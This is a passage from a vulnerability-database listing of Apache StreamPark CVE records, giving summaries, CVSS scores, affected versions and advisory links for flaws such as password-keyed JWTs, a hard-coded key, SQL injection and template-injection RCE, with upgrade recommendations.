Search criteria
51 vulnerabilities found for streampark by apache
FKIE_CVE-2025-53960
Vulnerability from fkie_nvd - Published: 2025-12-12 16:15 - Updated: 2025-12-16 21:28
Severity ?
Summary
When issuing JSON Web Tokens (JWT), Apache StreamPark directly uses the user's password as the HMAC signing key (e.g., with the HS256 algorithm). An attacker can exploit this vulnerability to perform offline brute-force attacks on the user's password using a captured JWT, or to arbitrarily forge identity tokens for the user if the password is already known, ultimately leading to complete account takeover.
This issue affects Apache StreamPark: from 2.0.0 before 2.1.7.
Users are recommended to upgrade to version 2.1.7, which fixes the issue.
References
| URL | Tags | ||
|---|---|---|---|
| security@apache.org | https://lists.apache.org/thread/xlpvfzf5l5m5mfyjwrz5h4dssm3c32vy | Mailing List, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2025/12/04/1 | Mailing List, Third Party Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| apache | streampark | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:apache:streampark:*:*:*:*:*:*:*:*",
"matchCriteriaId": "18BD3C9F-61F6-4D68-B0E7-333A94F827ED",
"versionEndExcluding": "2.1.7",
"versionStartIncluding": "2.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "When issuing JSON Web Tokens (JWT), Apache StreamPark directly uses the user\u0027s password as the HMAC signing key (e.g., with the HS256 algorithm). An attacker can exploit this vulnerability to perform offline brute-force attacks on the user\u0027s password using a captured JWT, or to arbitrarily forge identity tokens for the user if the password is already known, ultimately leading to complete account takeover.\n\n\n\n\n\n\n\nThis issue affects Apache StreamPark: from 2.0.0 before 2.1.7.\n\nUsers are recommended to upgrade to version 2.1.7, which fixes the issue."
}
],
"id": "CVE-2025-53960",
"lastModified": "2025-12-16T21:28:34.360",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.2,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
]
},
"published": "2025-12-12T16:15:44.463",
"references": [
{
"source": "security@apache.org",
"tags": [
"Mailing List",
"Vendor Advisory"
],
"url": "https://lists.apache.org/thread/xlpvfzf5l5m5mfyjwrz5h4dssm3c32vy"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2025/12/04/1"
}
],
"sourceIdentifier": "security@apache.org",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-1240"
}
],
"source": "security@apache.org",
"type": "Secondary"
}
]
}
FKIE_CVE-2025-54947
Vulnerability from fkie_nvd - Published: 2025-12-12 15:15 - Updated: 2025-12-15 17:20
Severity ?
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
5.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
5.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Summary
In Apache StreamPark versions 2.0.0 through 2.1.7, a security vulnerability involving a hard-coded encryption key exists. This vulnerability occurs because the system uses a fixed, immutable key for encryption instead of dynamically generating or securely configuring the key. Attackers may obtain this key through reverse engineering or code analysis, potentially decrypting sensitive data or forging encrypted information, leading to information disclosure or unauthorized system access.
This issue affects Apache StreamPark: from 2.0.0 before 2.1.7.
Users are recommended to upgrade to version 2.1.7, which fixes the issue.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| apache | streampark | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:apache:streampark:*:*:*:*:*:*:*:*",
"matchCriteriaId": "18BD3C9F-61F6-4D68-B0E7-333A94F827ED",
"versionEndExcluding": "2.1.7",
"versionStartIncluding": "2.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "In Apache StreamPark versions 2.0.0 through 2.1.7, a security vulnerability involving a hard-coded encryption key exists. This vulnerability occurs because the system uses a fixed, immutable key for encryption instead of dynamically generating or securely configuring the key. Attackers may obtain this key through reverse engineering or code analysis, potentially decrypting sensitive data or forging encrypted information, leading to information disclosure or unauthorized system access.\n\nThis issue affects Apache StreamPark: from 2.0.0 before 2.1.7.\n\nUsers are recommended to upgrade to version 2.1.7, which fixes the issue."
}
],
"id": "CVE-2025-54947",
"lastModified": "2025-12-15T17:20:46.757",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
]
},
"published": "2025-12-12T15:15:53.577",
"references": [
{
"source": "security@apache.org",
"tags": [
"Mailing List"
],
"url": "https://lists.apache.org/thread/kdntmzyzrco75x9q6mc6s8lty1fxmog1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2025/12/12/3"
}
],
"sourceIdentifier": "security@apache.org",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-321"
}
],
"source": "security@apache.org",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-798"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2025-54981
Vulnerability from fkie_nvd - Published: 2025-12-12 15:15 - Updated: 2025-12-15 17:19
Severity ?
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Summary
Weak Encryption Algorithm in StreamPark, The use of an AES cipher in ECB mode and a weak random number generator for encrypting sensitive data, including JWT tokens, may have risked exposing sensitive authentication data
This issue affects Apache StreamPark: from 2.0.0 before 2.1.7.
Users are recommended to upgrade to version 2.1.7, which fixes the issue.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| apache | streampark | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:apache:streampark:*:*:*:*:*:*:*:*",
"matchCriteriaId": "18BD3C9F-61F6-4D68-B0E7-333A94F827ED",
"versionEndExcluding": "2.1.7",
"versionStartIncluding": "2.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Weak Encryption Algorithm in StreamPark,\u00a0The use of an AES cipher in ECB mode and a weak random number generator for encrypting sensitive data, including JWT tokens, may have risked exposing sensitive authentication data\n\nThis issue affects Apache StreamPark: from 2.0.0 before 2.1.7.\n\nUsers are recommended to upgrade to version 2.1.7, which fixes the issue."
}
],
"id": "CVE-2025-54981",
"lastModified": "2025-12-15T17:19:19.633",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
]
},
"published": "2025-12-12T15:15:53.703",
"references": [
{
"source": "security@apache.org",
"tags": [
"Mailing List"
],
"url": "https://lists.apache.org/thread/9rbvdvwg5fdhzjdgyrholgso53r26998"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "http://www.openwall.com/lists/oss-security/2025/12/12/4"
}
],
"sourceIdentifier": "security@apache.org",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-327"
}
],
"source": "security@apache.org",
"type": "Secondary"
}
]
}
FKIE_CVE-2025-30001
Vulnerability from fkie_nvd - Published: 2025-10-10 10:15 - Updated: 2025-11-04 22:16
Severity ?
Summary
Incorrect Execution-Assigned Permissions vulnerability in Apache StreamPark.
This issue affects Apache StreamPark: from 2.1.4 before 2.1.6.
Users are recommended to upgrade to version 2.1.6, which fixes the issue.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| apache | streampark | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:apache:streampark:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E57C4042-F0B2-4C1B-8C3D-F627FF656819",
"versionEndExcluding": "2.1.6",
"versionStartIncluding": "2.1.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Incorrect Execution-Assigned Permissions vulnerability in Apache StreamPark.\n\nThis issue affects Apache StreamPark: from 2.1.4 before 2.1.6.\n\nUsers are recommended to upgrade to version 2.1.6, which fixes the issue."
}
],
"id": "CVE-2025-30001",
"lastModified": "2025-11-04T22:16:09.290",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.4,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
]
},
"published": "2025-10-10T10:15:33.960",
"references": [
{
"source": "security@apache.org",
"tags": [
"Mailing List",
"Vendor Advisory"
],
"url": "https://lists.apache.org/thread/xfmsvhkcnr1831n0w5ovy3p44lsmfb7m"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.openwall.com/lists/oss-security/2025/09/04/1"
}
],
"sourceIdentifier": "security@apache.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-279"
}
],
"source": "security@apache.org",
"type": "Secondary"
}
]
}
FKIE_CVE-2024-48988
Vulnerability from fkie_nvd - Published: 2025-08-22 19:15 - Updated: 2025-11-04 22:16
Severity ?
Summary
SQL Injection vulnerability in Apache StreamPark.
This issue affects Apache StreamPark: from 2.1.4 before 2.1.6.
Users are recommended to upgrade to version 2.1.6, which fixes the issue.
This vulnerability is present only in the distribution package (SpringBoot platform) and does not involve Maven artifacts.
It can only be exploited after a user has successfully logged into the platform (implying that the attacker would first need to compromise the login authentication).
As a result, the associated risk is considered relatively low.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| apache | streampark | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:apache:streampark:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E57C4042-F0B2-4C1B-8C3D-F627FF656819",
"versionEndExcluding": "2.1.6",
"versionStartIncluding": "2.1.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "SQL Injection vulnerability in Apache StreamPark.\n\nThis issue affects Apache StreamPark: from 2.1.4 before 2.1.6.\n\nUsers are recommended to upgrade to version 2.1.6, which fixes the issue.\n\n\nThis vulnerability is present only in the distribution package (SpringBoot platform) and does not involve Maven artifacts.\nIt can only be exploited after a user has successfully logged into the platform (implying that the attacker would first need to compromise the login authentication). \nAs a result, the associated risk is considered relatively low."
},
{
"lang": "es",
"value": "Vulnerabilidad de inyecci\u00f3n SQL en Apache StreamPark. Este problema afecta a Apache StreamPark desde la versi\u00f3n 2.1.4 hasta la 2.1.6. Se recomienda a los usuarios actualizar a la versi\u00f3n 2.1.6, que soluciona el problema. Esta vulnerabilidad solo est\u00e1 presente en el paquete de distribuci\u00f3n (plataforma SpringBoot) y no afecta a los artefactos Maven. Solo se puede explotar despu\u00e9s de que un usuario haya iniciado sesi\u00f3n correctamente en la plataforma (lo que implica que el atacante primero tendr\u00eda que comprometer la autenticaci\u00f3n de inicio de sesi\u00f3n). Por lo tanto, el riesgo asociado se considera relativamente bajo."
}
],
"id": "CVE-2024-48988",
"lastModified": "2025-11-04T22:16:04.210",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.6,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 4.7,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
]
},
"published": "2025-08-22T19:15:38.217",
"references": [
{
"source": "security@apache.org",
"tags": [
"Mailing List"
],
"url": "https://lists.apache.org/thread/26ng8388l93zwjrst560cbjz9x7wpq1s"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.openwall.com/lists/oss-security/2025/08/22/1"
}
],
"sourceIdentifier": "security@apache.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-564"
}
],
"source": "security@apache.org",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-89"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
FKIE_CVE-2024-29070
Vulnerability from fkie_nvd - Published: 2024-07-23 09:15 - Updated: 2025-07-10 18:24
Severity ?
Summary
On versions before 2.1.4, session is not invalidated after logout. When the user logged in successfully, the Backend service returns "Authorization" as the front-end authentication credential. "Authorization" can still initiate requests and access data even after logout.
Mitigation:
all users should upgrade to 2.1.4
References
| URL | Tags | ||
|---|---|---|---|
| security@apache.org | https://lists.apache.org/thread/zslblrz1l0n9t67mqdv42yv75ncfn9zl | Mailing List, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2024/07/22/4 | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.apache.org/thread/zslblrz1l0n9t67mqdv42yv75ncfn9zl | Mailing List, Vendor Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| apache | streampark | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:apache:streampark:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CE3AEB59-5615-48A9-8425-59FF2644C5F9",
"versionEndExcluding": "2.1.4",
"versionStartIncluding": "1.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "On versions before 2.1.4,\u00a0session is not invalidated after logout. When the user logged in successfully, the Backend service returns \"Authorization\" as the front-end authentication credential. \"Authorization\" can still initiate requests and access data even after logout.\n\nMitigation:\n\nall users should upgrade to 2.1.4\n\n"
},
{
"lang": "es",
"value": "En versiones anteriores a la 2.1.4, la sesi\u00f3n no se invalida despu\u00e9s de cerrar sesi\u00f3n. Cuando el usuario inicia sesi\u00f3n correctamente, el servicio Backend devuelve \"Authorization\" como credencial de autenticaci\u00f3n de front-end. La \"Authorization\" a\u00fan puede iniciar solicitudes y acceder a datos incluso despu\u00e9s de cerrar sesi\u00f3n. Mitigaci\u00f3n: todos los usuarios deben actualizar a 2.1.4"
}
],
"id": "CVE-2024-29070",
"lastModified": "2025-07-10T18:24:57.027",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.2,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
]
},
"published": "2024-07-23T09:15:02.503",
"references": [
{
"source": "security@apache.org",
"tags": [
"Mailing List",
"Vendor Advisory"
],
"url": "https://lists.apache.org/thread/zslblrz1l0n9t67mqdv42yv75ncfn9zl"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/22/4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Vendor Advisory"
],
"url": "https://lists.apache.org/thread/zslblrz1l0n9t67mqdv42yv75ncfn9zl"
}
],
"sourceIdentifier": "security@apache.org",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-613"
}
],
"source": "security@apache.org",
"type": "Secondary"
}
]
}
FKIE_CVE-2024-34457
Vulnerability from fkie_nvd - Published: 2024-07-22 10:15 - Updated: 2024-11-21 09:18
Severity ?
6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Summary
On versions before 2.1.4, after a regular user successfully logs in, they can manually make a request using the authorization token to view everyone's user flink information, including executeSQL and config.
Mitigation:
all users should upgrade to 2.1.4
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| apache | streampark | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:apache:streampark:*:*:*:*:*:*:*:*",
"matchCriteriaId": "43F40411-3380-4B0F-BA0D-18C85BD8C615",
"versionEndExcluding": "2.1.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "On versions before 2.1.4, after a regular user successfully logs in, they can manually make a request using the authorization token to view everyone\u0027s user flink information, including executeSQL and config.\n\nMitigation:\n\nall users should upgrade to 2.1.4"
},
{
"lang": "es",
"value": "En versiones anteriores a la 2.1.4, despu\u00e9s de que un usuario normal inicia sesi\u00f3n con \u00e9xito, puede realizar una solicitud manualmente utilizando el token de autorizaci\u00f3n para ver la informaci\u00f3n de flink de todos los usuarios, incluidos runSQL y config. Mitigaci\u00f3n: todos los usuarios deben actualizar a 2.1.4"
}
],
"id": "CVE-2024-34457",
"lastModified": "2024-11-21T09:18:43.260",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
]
},
"published": "2024-07-22T10:15:03.607",
"references": [
{
"source": "security@apache.org",
"tags": [
"Mailing List",
"Vendor Advisory"
],
"url": "https://lists.apache.org/thread/brlfrmvw9dcv38zoofmhxg7qookmwn7j"
},
{
"source": "security@apache.org",
"url": "https://www.openwall.com/lists/oss-security/2024/07/22/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.openwall.com/lists/oss-security/2024/07/22/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Vendor Advisory"
],
"url": "https://lists.apache.org/thread/brlfrmvw9dcv38zoofmhxg7qookmwn7j"
}
],
"sourceIdentifier": "security@apache.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-639"
}
],
"source": "security@apache.org",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-639"
}
],
"source": "nvd@nist.gov",
"type": "Secondary"
}
]
}
FKIE_CVE-2024-29178
Vulnerability from fkie_nvd - Published: 2024-07-18 12:15 - Updated: 2025-02-13 18:17
Severity ?
8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Summary
On versions before 2.1.4, a user could log in and perform a template injection attack resulting in Remote Code Execution on the server, The attacker must successfully log into the system to launch an attack, so this is a moderate-impact vulnerability.
Mitigation:
all users should upgrade to 2.1.4
References
| URL | Tags | ||
|---|---|---|---|
| security@apache.org | http://www.openwall.com/lists/oss-security/2024/07/18/1 | Mailing List, Third Party Advisory | |
| security@apache.org | https://lists.apache.org/thread/n6dhnl68knpxy80t35qxkkw2691l8sfn | Mailing List, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2024/07/18/1 | Mailing List, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.apache.org/thread/n6dhnl68knpxy80t35qxkkw2691l8sfn | Mailing List, Vendor Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| apache | streampark | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:apache:streampark:*:*:*:*:*:*:*:*",
"matchCriteriaId": "43F40411-3380-4B0F-BA0D-18C85BD8C615",
"versionEndExcluding": "2.1.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "On versions before 2.1.4, a user could log in and perform a template injection attack resulting in Remote Code Execution on the server,\u00a0The attacker must successfully log into the system to launch an attack, so this is a moderate-impact vulnerability.\n\nMitigation:\n\nall users should upgrade to 2.1.4"
},
{
"lang": "es",
"value": "En versiones anteriores a la 2.1.4, un usuario pod\u00eda iniciar sesi\u00f3n y realizar un ataque de inyecci\u00f3n de plantilla que generaba una ejecuci\u00f3n remota de c\u00f3digo en el servidor. El atacante deb\u00eda iniciar sesi\u00f3n correctamente en el sistema para lanzar un ataque, por lo que se trata de una vulnerabilidad de impacto moderado. Mitigaci\u00f3n: todos los usuarios deben actualizar a 2.1.4"
}
],
"id": "CVE-2024-29178",
"lastModified": "2025-02-13T18:17:50.040",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
]
},
"published": "2024-07-18T12:15:02.960",
"references": [
{
"source": "security@apache.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/18/1"
},
{
"source": "security@apache.org",
"tags": [
"Mailing List",
"Vendor Advisory"
],
"url": "https://lists.apache.org/thread/n6dhnl68knpxy80t35qxkkw2691l8sfn"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2024/07/18/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Vendor Advisory"
],
"url": "https://lists.apache.org/thread/n6dhnl68knpxy80t35qxkkw2691l8sfn"
}
],
"sourceIdentifier": "security@apache.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-94"
}
],
"source": "security@apache.org",
"type": "Secondary"
}
]
}
FKIE_CVE-2024-29120
Vulnerability from fkie_nvd - Published: 2024-07-17 15:15 - Updated: 2025-06-23 18:09
Severity ?
Summary
In Streampark (version < 2.1.4), when a user logged in successfully, the Backend service would return "Authorization" as the front-end authentication credential. User can use this credential to request other users' information, including the administrator's username, password, salt value, etc.
Mitigation:
all users should upgrade to 2.1.4
References
| URL | Tags | ||
|---|---|---|---|
| security@apache.org | http://www.openwall.com/lists/oss-security/2024/07/17/4 | Mailing List | |
| security@apache.org | https://lists.apache.org/thread/y3oqz7l8vd7jxxx3z2khgl625nvfr60j | Mailing List, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.openwall.com/lists/oss-security/2024/07/17/4 | Mailing List | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.apache.org/thread/y3oqz7l8vd7jxxx3z2khgl625nvfr60j | Mailing List, Vendor Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| apache | streampark | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:apache:streampark:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EA1D77DB-B854-44DA-9749-A3F326BD4D06",
"versionEndExcluding": "2.1.4",
"versionStartIncluding": "2.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "In Streampark (version \u003c 2.1.4), when a user logged in successfully, the Backend service would return \"Authorization\" as the front-end authentication credential. User can use this credential to request other users\u0027 information, including the administrator\u0027s username, password, salt value, etc.\u00a0\n\nMitigation:\n\nall users should upgrade to 2.1.4"
},
{
"lang": "es",
